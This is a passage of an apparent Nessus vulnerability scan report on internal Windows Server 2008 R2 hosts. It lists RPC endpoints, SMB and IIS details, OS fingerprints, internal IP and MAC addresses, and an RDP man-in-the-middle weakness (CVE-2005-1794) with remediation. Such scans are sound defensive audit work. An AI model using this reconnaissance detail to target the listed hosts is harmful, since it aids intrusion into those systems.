\PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP05 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP05 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E590 + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E590 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-d5210e0f8ffb777d67 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc039FD11 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-43ca78e049117df8f6 + +Object UUID : da42840e-c2f7-48e3-9fd4-4de954d9f72b +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-0846d5cf3aff833584 + +Object UUID : 14d80fb7-fead-4b0c-97e4-d397ae3f4936 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-0846d5cf3aff833584 + +Object UUID : 88111ddb-6c28-4200-b94c-f837c4ec221b +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-0846d5cf3aff833584 + +Object UUID : 7beda36f-0d2d-4cc1-a152-a8fbe46c8be3 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-0846d5cf3aff833584 + +Object UUID : 9bb2cebb-bff4-4acd-b3c7-e704575409e4 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLEDB87537A595D41E2BD88E959322B + +Object UUID : 9bb2cebb-bff4-4acd-b3c7-e704575409e4 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-cf7ed06c947e27e770 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-063604fc87b9857973 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-2ec552cc1cc2bb434b + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-f1e11ce8cb2220d0f7 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-f1e11ce8cb2220d0f7 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-f1e11ce8cb2220d0f7 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLEB2A4B02EFF0846EC9A8DA5F5845B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-f4c959c796bb4fc843 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLEB2A4B02EFF0846EC9A8DA5F5845B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-f4c959c796bb4fc843 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE41F9F8DAB7334AC892C1F3BDC2BD + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:46:01 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:dd +10.31.112.24 +172.16.138.2 +10.31.112.24 +qa3app04 +QA3APP04 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 766 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:38:50 GMT + Content-Length: 689 + + + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:dd : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not 